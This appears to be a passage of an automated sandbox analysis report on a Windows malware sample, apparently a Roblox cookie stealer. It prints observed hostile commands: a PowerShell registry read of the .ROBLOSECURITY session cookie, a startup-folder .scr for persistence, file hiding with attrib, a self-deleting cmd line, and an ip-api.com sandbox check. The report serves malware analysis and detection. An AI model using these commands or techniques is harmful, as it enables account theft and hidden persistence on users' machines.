                        Source: zamPeEkHWr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: zamPeEkHWr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                        Source: zamPeEkHWr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation

Source: C:\Users\user\Desktop\zamPeEkHWr.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Users\user\Desktop\zamPeEkHWr.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: zamPeEkHWr.exe Static PE information: 0x9C61056C [Wed Feb 19 18:54:36 2053 UTC]
Source: C:\Users\user\Desktop\zamPeEkHWr.exe Code function: 0_2_00007FFD9B8AABC0 push eax; iretd 0_2_00007FFD9B8AAC29
Source: C:\Users\user\Desktop\zamPeEkHWr.exe Code function: 0_2_00007FFD9B8700BD pushad ; iretd 0_2_00007FFD9B8700C1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD9B77D2A5 pushad ; iretd 5_2_00007FFD9B77D2A6
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD9B962316 push 8B485F93h; iretd 5_2_00007FFD9B96231B
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD9B972FA4 push edx; iretd 8_2_00007FFD9B972FAA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD9B8B6387 push esp; retf 10_2_00007FFD9B8B6388
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 15_2_00007FFD9B886387 push esp; retf 15_2_00007FFD9B886388
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 23_2_00007FFD9B870D20 push eax; retf 23_2_00007FFD9B870D4D

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\zamPeEkHWr.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scr
Source: C:\Users\user\Desktop\zamPeEkHWr.exe Process created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\zamPeEkHWr.exe"

Boot Survival

Source: C:\Users\user\Desktop\zamPeEkHWr.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scr
Source: C:\Users\user\Desktop\zamPeEkHWr.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\kaS9T.scr
Source: C:\Users\user\Desktop\zamPeEkHWr.exe File created: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\kaS9T.scr\:Zone.Identifier:$DATA

                        Hooking and other Techniques for Hiding and Protection

                        barindex
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\zamPeEkHWr.exe" && pause
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess created: "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\zamPeEkHWr.exe" && pauseJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX (3 identical entries)
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX (72 identical entries)
                        Source: C:\Windows\System32\wbem\WMIC.exe | Process information set: NOOPENFILEERRORBOX

                        Malware Analysis System Evasion

                        Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Memory allocated: 1EAAE7E0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Memory allocated: 1EAC82F0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Thread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Thread delayed: delay time: 597094
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Thread delayed: delay time: 596969
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Thread delayed: delay time: 596860
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Thread delayed: delay time: 596735
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Thread delayed: delay time: 596610
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Thread delayed: delay time: 596485
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Thread delayed: delay time: 596360
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Thread delayed: delay time: 596235
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Thread delayed: delay time: 596075
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Thread delayed: delay time: 595853
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Thread delayed: delay time: 595750
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Thread delayed: delay time: 595641
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Thread delayed: delay time: 595531
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Thread delayed: delay time: 595422
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Thread delayed: delay time: 595313
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Thread delayed: delay time: 595188
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Thread delayed: delay time: 595063
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Thread delayed: delay time: 594938
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Thread delayed: delay time: 594828
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Thread delayed: delay time: 594716
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Thread delayed: delay time: 594609
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Thread delayed: delay time: 594499
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Thread delayed: delay time: 594388
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Thread delayed: delay time: 594281
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Thread delayed: delay time: 594172
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Thread delayed: delay time: 594063
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Thread delayed: delay time: 593938
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Thread delayed: delay time: 593813
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Thread delayed: delay time: 593688
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Thread delayed: delay time: 593563
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe | Thread delayed: delay time: 593453
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 593342Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 593234Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 593125Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 593008Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 592900Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 592793Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 592688Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 592563Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 592438Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 592313Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 592187Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 592078Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 591969Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 591844Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 591735Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 591610Jump to behavior
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exeThread delayed: delay time: 591485Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe Window / User API: threadDelayed 5410
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe Window / User API: threadDelayed 4425
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5181
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4695
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3148
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5066
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1151
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4683
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2908
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4163
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 361
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -30437127721620741s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -597094s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -596969s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -596860s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -596735s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -596610s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -596485s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -596360s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -596235s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -596075s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -595853s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -595750s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -595641s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -595531s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -595422s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -595313s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -595188s >= -30000s
                        Source: C:\Users\user\Desktop\zamPeEkHWr.exe TID: 7432 Thread sleep time: -595063s >= -30000s
